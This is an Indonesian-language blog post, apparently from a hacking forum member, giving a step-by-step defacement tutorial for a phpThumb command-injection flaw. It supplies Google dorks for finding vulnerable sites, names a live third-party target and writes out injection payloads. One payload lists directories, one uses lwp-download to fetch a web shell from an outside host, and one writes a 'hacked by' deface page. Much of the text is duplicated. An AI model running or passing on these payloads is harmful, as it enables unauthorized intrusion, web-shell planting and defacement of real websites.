Tuesday, August 11, 2020
Ok halo semuanya, balik lagi di blog ini, sekarang jarang upload artikel karena lebih sering diskusi di XploitSec International Forum ( https://xsec.indonesianforum.net ). dan kali ini saya akan membagikan tutorial deface phpThumb Command Injection To RCE, exploit lama yang kembali saya buat ulang + perjelas tutorialnya. ok langsung aja.
#Google Dork :
inurl:/phpThumb/phpThumb.php
"/ibrowser/scripts/"
Ok Pertama kalian bisa dorking dulu atau gunakan live target diatas, kemudian masukkan exploit pada akhir phpThumb.php contoh http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9
kemudian lihat kebagian bawah webnya kalau muncul isi dir dari web tersebut, artinya command berhasil tereksekusi di servernya. ( lihat gambar bawah ).
kemudian kita spawn shell dengan memasukkan exploit : ?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download http://files.xploitsecid.or.id/mar.txt mar.php;&phpThumbDebug=9 dan akses filenya : https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/mar.php
tapi berhubung webnya gabisa di upload shell, jadi kita creat file dengan isi sc deface : ?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;echo "<center><h1>hacked by linuxploit</h1>" > lx.php;&phpThumbDebug=9
and boom
hasil : https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/lx.php
ok itu saja yg bisa saya sampaikan, kurang lebihnya mohon maaf
#Google Dork :
inurl:/phpThumb/phpThumb.php
"/ibrowser/scripts/"
"/ibrowser/scripts/phpThumb/phpThumb.php"
inurl:/scripts/phpThumb/phpThumb.php
#Live Target : http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php
#Exploit :
#Exploit :
?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9
Ok Pertama kalian bisa dorking dulu atau gunakan live target diatas, kemudian masukkan exploit pada akhir phpThumb.php contoh http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9
![http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9](http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;ls%20-la;&phpThumbDebug=9){kind=link}
kemudian lihat kebagian bawah webnya kalau muncul isi dir dari web tersebut, artinya command berhasil tereksekusi di servernya. ( lihat gambar bawah ).
kemudian kita spawn shell dengan memasukkan exploit : ?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download http://files.xploitsecid.or.id/mar.txt mar.php;&phpThumbDebug=9 dan akses filenya : https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/mar.php
tapi berhubung webnya gabisa di upload shell, jadi kita creat file dengan isi sc deface : ?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;echo "<center><h1>hacked by linuxploit</h1>" > lx.php;&phpThumbDebug=9
and boom
hasil : https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/lx.php
ok itu saja yg bisa saya sampaikan, kurang lebihnya mohon maaf